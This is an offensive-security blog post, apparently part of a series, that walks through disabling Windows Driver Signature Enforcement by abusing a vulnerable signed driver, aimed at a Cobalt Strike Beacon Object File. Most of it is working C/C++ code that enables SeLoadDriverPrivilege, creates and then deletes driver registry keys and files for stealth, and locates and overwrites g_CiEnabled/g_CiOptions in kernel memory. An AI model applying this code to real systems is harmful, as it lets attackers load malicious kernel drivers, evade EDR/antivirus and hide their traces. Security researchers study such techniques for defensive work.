  • No Structured Exception Handling (SEH)
  • Cannot be unloaded, so they persist until reboot
  • Only ntoskrnl.exe imports are resolved
  • Cannot use certain kernel primitives like callbacks because of PatchGuard

I won’t go into much detail here, but manual mapping comes with so much overhead and instability that it is out of the equation (until I get bored). So instead, I’ll have to sacrifice some OPSEC and touch disk for a safer and more stable result. I’m currently developing a BOF to disable DSE using CVE-2015-2291 which will also be integrated in my CobaltWhispers framework for Cobalt Strike, which I just updated to use SysWhispers2 and InlineWhispers2 to dynamically resolve direct syscalls.

Disable DSE

4. Conclusion

With the release of this blogpost, the kernel driver Interceptor is nearly complete in functionality and is able to fulfill its purpose. Tools aren’t very useful if they don’t work outside of a lab environment, and not all of us have magical access to code signing certificates and administrator privileges in a target environment. I spent a good amount of time uncovering new and different hurdles that come with the scenario I presented, and subsequently tried to find solutions to them. I guess it goes to show that most challenges to remain undetected and bypass EDR/AV are still presented in user space and have to be addressed as such.

Besides the challenges in user space, there are still several kernel space aspects I want to look at in upcoming blogposts if time permits. These include:

  • disabling Sysmon and Event Tracing for Windows (ETW)
  • hooking minifilters
  • inspecting and filtering IRPs

But as with everything, time flies by when one’s having fun 😉

Kernel Karnage – Part 8 (Getting Around DSE)

10 January 2022 at 08:00

When life gives you exploits, you turn them into Beacon Object Files.

1. Back to BOFs

I never thought I would say this, but after spending so much time in kernel land, it’s almost as if developing kernel functionality is easier than writing user land applications, especially when they need to fly under the radar. As I mentioned in my previous blogpost, I am in dire need of a Beacon Object File to disable Driver Signature Enforcement (DSE) from memory. However, writing a BOF with such complex functionality results in a lot of code and is hard to test and debug, especially when also using direct syscalls. So I decided to first write a regular C/C++ console application which should do exactly the same, except for the integration part with CobaltWhispers which takes care of the payload.

2. May I load drivers, please?

The first task at hand is making sure the current process context we’re in has sufficient privileges to load or unload a driver. By default, even in elevated context, the required privilege SeLoadDriverPrivilege is disabled.

SeLoadDriverPrivilege disabled

Luckily, changing the privileges isn’t too difficult. At boot time, each privilege is assigned a locally unique identifier (LUID). Using the LookupPrivilegeValue() function, the LUID associated with SeLoadDriverPrivilege can be retrieved and passed to NtAdjustPrivilegesToken() together with the SE_PRIVILEGE_ENABLED flag.

TOKEN_PRIVILEGES tp;
LUID luid;
HANDLE hToken;

NTSTATUS status = NtOpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);

LookupPrivilegeValue(nullptr, L"SeLoadDriverPrivilege", &luid);

tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

NtAdjustPrivilegesToken(hToken, FALSE, &tp, 0, nullptr, 0);

SeLoadDriverPrivilege enabled

3. Down to business

Once the privileges are sorted, we can move on to the next step, which is creating the necessary registry key and its values. When a driver is loaded using the NtLoadDriver() API, a registry key is passed as a parameter. This registry key is necessary because it contains the location of the driver on disk (this is why we need to touch disk to load a driver), as well as a couple of other values indicating the type of driver, the error handling when the driver fails to start, and when in the boot sequence the driver should be started.

Creating registry keys is nothing new:

HANDLE hKey;
ULONG disposition;
OBJECT_ATTRIBUTES oa;
UNICODE_STRING keyName;
RtlInitUnicodeString(&keyName, KeyName);

InitializeObjectAttributes(&oa, &keyName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);

NtCreateKey(&hKey, KEY_ALL_ACCESS, &oa, 0, nullptr, REG_OPTION_NON_VOLATILE, &disposition);

UNICODE_STRING keyValueName;
RtlInitUnicodeString(&keyValueName, L"ErrorControl");
DWORD keyValue = SERVICE_ERROR_NORMAL;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"Type");
keyValue = SERVICE_KERNEL_DRIVER;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"Start");
keyValue = SERVICE_DEMAND_START;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"ImagePath");
UNICODE_STRING DriverImagePath;
RtlInitUnicodeString(&DriverImagePath, DriverPath);
NtSetValueKey(hKey, &keyValueName, 0, REG_EXPAND_SZ, (BYTE*)DriverImagePath.Buffer, DriverImagePath.Length + sizeof(UNICODE_NULL));

The registry key has been successfully created and the ImagePath value points to the driver on disk.

Driver registry entrance

The registry key can then be passed to NtLoadDriver(), which will read the driver from disk and load it into memory. Once the driver is no longer needed, it can be unloaded by passing the same registry key to NtUnloadDriver(). For OPSEC considerations, once the driver is unloaded from the system, the registry key and binary on disk should also be removed, which is relatively easy with calls to NtOpenKeyEx(), NtDeleteKey() and NtDeleteFile().

NtLoadDriver(&keyName);
//do stuff
NtUnloadDriver(&keyName);

HANDLE hKey;
OBJECT_ATTRIBUTES oa;
InitializeObjectAttributes(&oa, &keyName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NtOpenKeyEx(&hKey, DELETE, &oa, 0);
NtDeleteKey(hKey);

InitializeObjectAttributes(&oa, &DriverImagePath, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NtDeleteFile(&oa);

4. A touch of black magic and a sprinkle of luck

Now that I’m able to load and unload a signed driver, it’s time to figure out how to tackle DSE.

Driver Signature Enforcement is part of Windows Code Integrity (CI) and, depending on the Windows build version, it is located in ntoskrnl.exe or CI.dll as a global non-exported variable (flag). Before Windows 8 build 9600, the DSE flag is located in ntoskrnl.exe as nt!g_CiEnabled, which is a global boolean variable toggling DSE either enabled or disabled. In more recent builds, the DSE flag can be found in CI.dll as CI!g_CiOptions, which is a combination of flags (0x0=disabled, 0x6=enabled, 0x8=test mode).
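The build split and the flag values described above can be written down as a short, portable sketch. SelectDseVariable() and DescribeCiOptions() are hypothetical helpers for illustration only; treating the quoted values as exact matches, rather than as individual bits, is a simplifying assumption.

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// Pick the variable name that holds the DSE state for a given build number,
// using the 9600 threshold quoted in the text.
std::string SelectDseVariable(std::uint32_t buildNumber) {
    return buildNumber < 9600 ? "nt!g_CiEnabled" : "CI!g_CiOptions";
}

// Map the g_CiOptions values quoted in the text to a readable state.
// Any other value is reported as unknown instead of being guessed.
std::string DescribeCiOptions(std::uint32_t value) {
    switch (value) {
        case 0x0: return "disabled";
        case 0x6: return "enabled";
        case 0x8: return "test mode";
        default:  return "unknown";
    }
}
```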

For a more detailed write-up or insight into DSE I recommend A quick insight into Driver Signature Enforcement by @j00ru, Capcom Rootkit Proof-Of-Concept by @FuzzySec and Loading unsigned Windows drivers without reboot by @vikingfr.

In a nutshell, the idea is to (ab)use a vulnerable signed driver with an arbitrary kernel memory read/write exploit, locate either the g_CiEnabled or g_CiOptions variable in kernel memory and overwrite the value with 0x0 to disable DSE using the vulnerable driver. Once DSE is disabled, the malicious driver can be loaded, after which the DSE value should be restored as soon as possible, because DSE is protected by PatchGuard. That might sound relatively straightforward, but the hard part is locating g_CiEnabled or g_CiOptions: even though we know where to look, they are not exported, so we need to perform offset calculations.

Since in theory any vulnerable driver with the ability to read/write kernel memory can be used, I won’t be covering the specifics of my vulnerable driver. I relied heavily on KDU’s source code for the implementation of locating g_CiEnabled / g_CiOptions. A lot of code is copied directly from KDU and slightly modified to target a single vulnerable driver, use lower level API calls or direct syscalls, and be more readable overall.

Starting from the top, I have a function ControlDSE() responsible for toggling the DSE value. This function calls QueryVariable() which returns the address in memory of the DSE variable and then calls the vulnerable driver via the DriverReadVirtualMemory() and DriverWriteVirtualMemory() functions to control the DSE value.

NTSTATUS ControlDSE(HANDLE DeviceHandle, ULONG buildNumber, ULONG DSEValue) {
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    ULONG_PTR variableAddress;
    ULONG flags = 0;

    // locate the address in memory of the DSE variable
    variableAddress = QueryVariable(buildNumber);
    if (variableAddress == 0) // QueryVariable() returns 0 when the variable could not be located
        return status;

    DriverReadVirtualMemory(DeviceHandle, variableAddress, &flags, sizeof(flags));
    if (DSEValue == flags) // current DSE value equals the DSE value we want to set
        return STATUS_SUCCESS;

    status = DriverWriteVirtualMemory(DeviceHandle, variableAddress, &DSEValue, sizeof(DSEValue));
    if (NT_SUCCESS(status)) {
        // confirm the new DSE value is written to memory
        flags = 0;

        DriverReadVirtualMemory(DeviceHandle, variableAddress, &flags, sizeof(flags));
        if (flags == DSEValue)
            printf("New DSE value set\n");
        else
            printf("Failed to set new DSE value\n");
    }
    return status;
}

To locate the address of the DSE variable in memory, QueryVariable() first retrieves the base address of the loaded module in kernel space. Under the hood, GetModuleBaseByName() uses NtQuerySystemInformation() with the SystemModuleInformation information class to retrieve a list of loaded modules and then performs a basic string comparison until it has found the module it’s looking for. Next, QueryVariable() maps a copy of the module into its own virtual memory, which is later used to calculate offsets, and calls QueryCiEnabled() or QueryCiOptions() respectively depending on the build number.

ULONG_PTR QueryVariable(ULONG buildNumber) {
	NTSTATUS status;
	ULONG loadedImageSize = 0;
	SIZE_T sizeOfImage = 0;
	ULONG_PTR result = 0, imageLoadedBase, kernelAddress = 0;
	const char* moduleNameA = nullptr;
    PCWSTR moduleNameW = nullptr;
	HMODULE mappedImageBase;

	WCHAR szFullModuleName[MAX_PATH * 2];

	if (buildNumber < 9600) { // WIN8
		moduleNameA = "ntoskrnl.exe";
        moduleNameW = L"ntoskrnl.exe";
    }
	else {
		moduleNameA = "CI.dll";
        moduleNameW = L"CI.dll";
    }

    // get the base address of the module loaded in kernel space
	imageLoadedBase = GetModuleBaseByName(moduleNameA, &loadedImageSize);
	if (imageLoadedBase == 0)
		return 0;

	szFullModuleName[0] = 0;
	if (!GetSystemDirectory(szFullModuleName, MAX_PATH))
		return 0;

	wcscat_s(szFullModuleName, MAX_PATH * 2, L"\\");
	wcscat_s(szFullModuleName, MAX_PATH * 2, moduleNameW);

    // map a local copy of the module
	mappedImageBase = LoadLibraryEx(szFullModuleName, nullptr, DONT_RESOLVE_DLL_REFERENCES);
	if (mappedImageBase == nullptr)
		return 0;

    if (buildNumber < 9600) {
        status = QueryImageSize(mappedImageBase, &sizeOfImage);

        if (NT_SUCCESS(status)) {
            // calculate offsets and find g_CiEnabled address
            status = QueryCiEnabled(mappedImageBase, imageLoadedBase, &kernelAddress, sizeOfImage);
        }
    }
    else {
        // calculate offsets and find g_CiOptions address
        status = QueryCiOptions(mappedImageBase, imageLoadedBase, &kernelAddress, buildNumber);
    }

    if (NT_SUCCESS(status)) {
        // verify if the found address is in a valid memory range associated with the loaded module in kernel space
        if (IN_REGION(kernelAddress, imageLoadedBase, loadedImageSize))
            result = kernelAddress;
    }

    FreeLibrary(mappedImageBase);
	return result;
}
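The final sanity check in QueryVariable() relies on an IN_REGION macro whose definition is not shown here. A minimal sketch of such a range check, assuming a half-open range [base, base + size), could look like the hypothetical InRegion() function below.

```cpp
#include <cassert>
#include <cstdint>

// Return true when address lies inside [base, base + size).
// Comparing (address - base) against size avoids overflow in base + size.
// The half-open range is an assumption; the original macro is not shown.
bool InRegion(std::uint64_t address, std::uint64_t base, std::uint64_t size) {
    return address >= base && (address - base) < size;
}
```

A check like this guards against a miscalculated offset that would otherwise point outside the loaded module.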

The QueryCiEnabled() and QueryCiOptions() functions perform the actual black magic of calculating the right offsets using the kernel module and local mapped copy. QueryCiOptions() makes use of the Hacker Disassembler Engine 64 (modified to be a single C/C++ header file) to inspect the assembly instructions and calculate the right offset. Once the local offset has been calculated and stored in the ptrCode variable, the actual address is calculated by adding the local offset to the kernel module base address and subtracting the base address of the locally mapped copy.

NTSTATUS QueryCiOptions(HMODULE ImageMappedBase, ULONG_PTR ImageLoadedBase, ULONG_PTR* ResolvedAddress, ULONG buildNumber) {
	PBYTE ptrCode = nullptr;
	ULONG offset, k, expectedLength;
	LONG relativeValue = 0;
	ULONG_PTR resolvedAddress = 0;

	hde64s hs;

	*ResolvedAddress = 0ULL;

	ptrCode = (PBYTE)GetProcAddress(ImageMappedBase, (PCHAR)"CiInitialize");
	if (ptrCode == nullptr)
		return STATUS_PROCEDURE_NOT_FOUND;

	RtlSecureZeroMemory(&hs, sizeof(hs));
	offset = 0;

	if (buildNumber < 16299) {
		expectedLength = 5;

		do {
            hde64_disasm(&ptrCode[offset], &hs);
            if (hs.flags & F_ERROR)
                break;

            if (hs.len == expectedLength) { //test if jmp
                // jmp CipInitialize
                if (ptrCode[offset] == 0xE9) {
                    relativeValue = *(PLONG)(ptrCode + offset + 1);
                    break;
                }
            }
            offset += hs.len;
        } while (offset < 256);
	}
	else {
		expectedLength = 3;

		do {
            hde64_disasm(&ptrCode[offset], &hs);
            if (hs.flags & F_ERROR)
                break;

            if (hs.len == expectedLength) {
                // Parameters for the CipInitialize.
                k = CheckInstructionBlock(ptrCode,
                    offset);

                if (k != 0) {
                    expectedLength = 5;
                    hde64_disasm(&ptrCode[k], &hs);
                    if (hs.flags & F_ERROR)
                        break;
                    // call CipInitialize
                    if (hs.len == expectedLength) {
                        if (ptrCode[k] == 0xE8) {
                            offset = k;
                            relativeValue = *(PLONG)(ptrCode + k + 1);
                            break;
                        }
                    }
                }
            }
            offset += hs.len;
        } while (offset < 256);
	}

	if (relativeValue == 0)
		return STATUS_UNSUCCESSFUL;

	ptrCode = ptrCode + offset + hs.len + relativeValue;
	relativeValue = 0;
	offset = 0;
	expectedLength = 6;

	do {
        hde64_disasm(&ptrCode[offset], &hs);
        if (hs.flags & F_ERROR)
            break;

        if (hs.len == expectedLength) { //test if mov
            if (*(PUSHORT)(ptrCode + offset) == 0x0d89) {
                relativeValue = *(PLONG)(ptrCode + offset + 2);
                break;
            }
        }
        offset += hs.len;
    } while (offset < 256);

	if (relativeValue == 0)
		return STATUS_UNSUCCESSFUL;

	ptrCode = ptrCode + offset + hs.len + relativeValue;
    // calculate the actual address in kernel space:
    // take the offset of ptrCode within the locally mapped copy
    // and add it to the base address of the module loaded in kernel space
	resolvedAddress = ImageLoadedBase + (ULONG_PTR)(ptrCode - (PBYTE)ImageMappedBase);

	*ResolvedAddress = resolvedAddress;
	return STATUS_SUCCESS;
}
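The two pieces of arithmetic that QueryCiOptions() repeats can be isolated into a small worked example. The sketch below uses plain integers instead of pointers so it can run anywhere; ResolveRelative() and TranslateToLoaded() are hypothetical names, and the addresses in the usage note are made up.

```cpp
#include <cassert>
#include <cstdint>

// Resolve the target of an x64 instruction that carries a signed 32-bit
// relative displacement: target = address of the next instruction + displacement.
std::uint64_t ResolveRelative(std::uint64_t instructionAddress,
                              std::uint32_t instructionLength,
                              std::int32_t displacement) {
    // Sign-extend the displacement, then rely on modular unsigned arithmetic.
    const std::uint64_t extended =
        static_cast<std::uint64_t>(static_cast<std::int64_t>(displacement));
    return instructionAddress + instructionLength + extended;
}

// Translate an address inside the locally mapped copy of a module to the
// matching address in the copy loaded at loadedBase.
std::uint64_t TranslateToLoaded(std::uint64_t localAddress,
                                std::uint64_t mappedBase,
                                std::uint64_t loadedBase) {
    return loadedBase + (localAddress - mappedBase);
}
```

For example, a 5-byte instruction at 0x1000 with a displacement of 0x20 resolves to 0x1025, and a local address 0x1234 bytes into the mapped copy translates to the loaded base plus 0x1234.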

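QueryCiEnabled() scans the locally mapped image for the hardcoded 4-byte signature 0x1D8806EB (the bytes EB 06 88 1D in memory), reads the 32-bit relative displacement that follows it, and resolves the address relative to the end of that 8-byte sequence.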

NTSTATUS QueryCiEnabled(HMODULE ImageMappedBase, ULONG_PTR ImageLoadedBase, ULONG_PTR* ResolvedAddress, SIZE_T SizeOfImage) {
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	SIZE_T c;
	LONG rel = 0;

	*ResolvedAddress = 0;

	for (c = 0; c + 2 * sizeof(DWORD) <= SizeOfImage; c++) { // signature + displacement must fit in the image
		if (*(PDWORD)((PBYTE)ImageMappedBase + c) == 0x1d8806eb) {
			rel = *(PLONG)((PBYTE)ImageMappedBase + c + 4);
			*ResolvedAddress = ImageLoadedBase + c + 8 + rel;
			status = STATUS_SUCCESS;
			break;
		}
	}
	return status;
}
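To show the scan in isolation, the sketch below runs the same idea over a synthetic byte buffer instead of a mapped module. FindSignatureTarget() is a hypothetical helper; it returns an offset within the buffer rather than a kernel address, and it assumes a little-endian host when reading the displacement.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Scan a buffer for the byte sequence EB 06 88 1D and return the offset the
// following 32-bit displacement points to, measured from the end of the
// 8-byte sequence. Returns -1 when the signature is not present.
std::int64_t FindSignatureTarget(const std::vector<std::uint8_t>& image) {
    static const std::uint8_t kSignature[4] = {0xEB, 0x06, 0x88, 0x1D};
    // The signature and the displacement together need 8 bytes.
    for (std::size_t c = 0; c + 8 <= image.size(); ++c) {
        if (std::memcmp(&image[c], kSignature, sizeof(kSignature)) != 0) {
            continue;
        }
        std::int32_t rel = 0;
        std::memcpy(&rel, &image[c + 4], sizeof(rel));  // little-endian host assumed
        return static_cast<std::int64_t>(c) + 8 + rel;
    }
    return -1;
}
```

With the signature placed at offset 4 and a displacement of 0x10, the resolved offset is 4 + 8 + 16 = 28, which mirrors the `c + 8 + rel` expression in QueryCiEnabled().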

5. Conclusion

Programmatically loading drivers has its challenges, but it goes to show if you’re willing to mess around in memory a bit, Windows security components can be bypassed with relative ease. A lot of existing research and exploits are already out there and Microsoft has put in little effort to mitigate them or update existing functionality like Code Integrity to be better protected against attacks. Even if additional patches have fixed certain issues, chaining different exploits together still gets the job done.

I’m still busy investigating the exact workings of QueryCiEnabled() and QueryCiOptions() as I would like to remove dependencies on hardcoded offsets or external libraries/tools like Hacker Disassembler Engine 64. Once this process is complete, I can move on to optimizing code for OPSEC purposes, for example implementing direct syscalls as much as possible, and then convert the final result to a Beacon Object File for Cobalt Strike.
